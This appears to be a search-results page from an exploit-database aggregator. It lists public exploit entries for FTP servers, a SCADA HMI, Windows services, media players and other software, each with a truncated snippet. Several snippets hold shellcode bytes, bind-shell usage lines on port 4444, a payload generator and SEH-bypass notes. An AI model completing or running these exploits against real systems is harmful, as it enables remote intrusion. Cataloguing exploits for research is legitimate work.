60 matches found
EUVD-2005-0905
Malware in sbrugna...
Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit
No description provided by source. Ability Ftp Server 2.34 Remote exploit in APPE command discovered,exploited by KaGra Use it with netcat: exploit.py|nc host 21 BindShell at port 4444,one shot OnLy! import struct shell = \xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66 shell +=...
KingView 6.5.3 SCADA HMI Heap Overflow PoC
No description provided by source. Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC Date: 9/28/2010 Author: Dillon Beresford Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53EN.rar Version: 6.53 English Tested on: Windows XP SP1 works on SP2 an...
Huawei Technologies Internet Mobile - Unicode SEH Exploit
No description provided by source. !/usr/bin/perl Souhail Hammou - Independant Security Researcher & Penetration Tester . Facebook : www.facebook.com/dark.puzzle.sec E-mail : [email protected] Greetings to all moroccan researchers and white hats . Vulnerable : Etisalat , Vodafone , Meditel ,...
Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit
No description provided by source. !/usr/bin/python Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret to work correctly despite the large number of usable addresses that were tested. $ ./kolibri.py 192.168.1.146 8080 Kolibri+...
Teamtek Universal FTP Server Multiple Commands Remote Denial of Service Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/21085/info Universal FTP Server is prone to multiple remote denial-of-service vulnerabilities because the application fails to handle exceptional conditions. An attacker can exploit these issues to crash the affected...
NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
No description provided by source. Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit Date: 10/31/2011 Author: Dillon Beresford Twitter: https://twitter.com/!/D1N Software Link: http://www.njstar.com/download/njcom.exe Version: 3.00 and prior Build: 11818 and prior Tested on:...
Huawei Technologies Internet Mobile - Unicode (SEH)
Huawei Technologies Internet Mobile - Unicode SEH !/usr/bin/perl Souhail Hammou - Independant Security Researcher & Penetration Tester . Facebook : www.facebook.com/dark.puzzle.sec E-mail : [email protected] Greetings to all moroccan researchers and white hats . Vulnerable : Etisalat , Vodafone...
ZipItFast PRO 3.0 Heap Overflow
!/usr/bin/perl --------------------------------------------------------------------------- Exploit: ZipItFast PRO v3.0 Heap-Overflow Author: b33f - http://www.fuzzysecurity.com/ OS: Windows XP SP1 DOS POC: C4SS!0 G0M3S = http://www.exploit-db.com/exploits/17512/ Software:...
ZipItFast PRO 3.0 - Local Heap Overflow
!/usr/bin/perl --------------------------------------------------------------------------- Exploit: ZipItFast PRO v3.0 Heap-Overflow Author: b33f - http://www.fuzzysecurity.com/ OS: Windows XP SP1 DOS POC: C4SS!0 G0M3S = http://www.exploit-db.com/exploits/17512/ Software:...
KingView 6.5.3 - SCADA HMI Heap Overflow
Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC Date: 9/28/2010 Author: Dillon Beresford Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53EN.rar Version: 6.53 English Tested on: Windows XP SP1 works on SP2 and SP3 will release new targets afte...
McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write
GOODFELLAS Security Research TEAM http://goodfellas.shellcode.com.ar Greetings to str0ke McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write ============================================================================== Internal ID: VULWAR20090616. -----------...
windows xp/sp1 generate portbind payload
windows xp/sp1 generate portbind payload. Shellcode exploit for generator platform http://www.shell-storm.org/shellcode/ / function syntax echo "\nSyntax:\nroot@laptop:/ php ./payload.php \n\n"; function win32bind$port if$port 65535 || $port 4100 echo "Erreur Port\nSelect a port between 4100 and...
VLC Media Player TY File Stack Based Buffer Overflow Exploit
Exploit for unknown platform in category local exploits ============================================================ VLC Media Player TY File Stack Based Buffer Overflow Exploit ============================================================ !/usr/bin/perl 10/21/2008 ksOSe use warnings; use strict;...
Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) (MS08-021)
EMRCOLORMATCHTOTARGETW stack buffer overflow exploit By Ac!dDrop This is one of the 2 Vulnerabilities of MS08-021 Tested on Windows xp professional SP1 GDi32.dll 5.1.2600.1106 kernel32.dll 5.1.2600.1106 ws232.dll 5.1.2600.0 calc.zip--- executes calculator IE.zip and localhost.zip ------ connects ...
FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)
!/usr/bin/perl ksOSe 08/17/2008 bypass safeseh using flash9f.ocx. use warnings; use strict; use IO::Socket; win32exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b"...
MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)
No description provided by source. / HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2 Copyright c 2005 houseofdabus. MS05-039 Microsoft Windows Plug-and-Play Service Remote Overflow Universal Exploit + no crash shellcode .:: houseofdabus ::...
WS_FTP Server <= 4.0.2 ALLO Remote Buffer Overflow Exploit
No description provided by source. / Ipswitch WSFTP Server = 4.0.2 ALLO exploit c2004 Hugh Mann [email protected] This exploit has been tested with WSFTP Server 4.0.2.EVAL, Windows XP SP1 NOTE: - The exploit assumes the user has a total file size limit. If the user only has...
Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
!/usr/bin/python Kantaris 0.3.4 Media Player Local Buffer Overflow 0day! The following exploit will make a film.ssa file, just rename the file with the name of your movie, and use your imagination to pwn! : Shellcode is local bind shell, just telnet to port:4444 to get command prompt : BIG thanks...
Microsoft Excel rtAFDesc record invalid pointer access
Added: 01/17/2008 CVE: CVE-2008-0081 BID: 27305 OSVDB: 40344 Background Microsoft Excel, part of the Microsoft Office product suite, is a spreadsheet application for Windows platforms. Problem Microsoft Excel references an uninitialized pointer if a spreadsheet contains an improperly placed...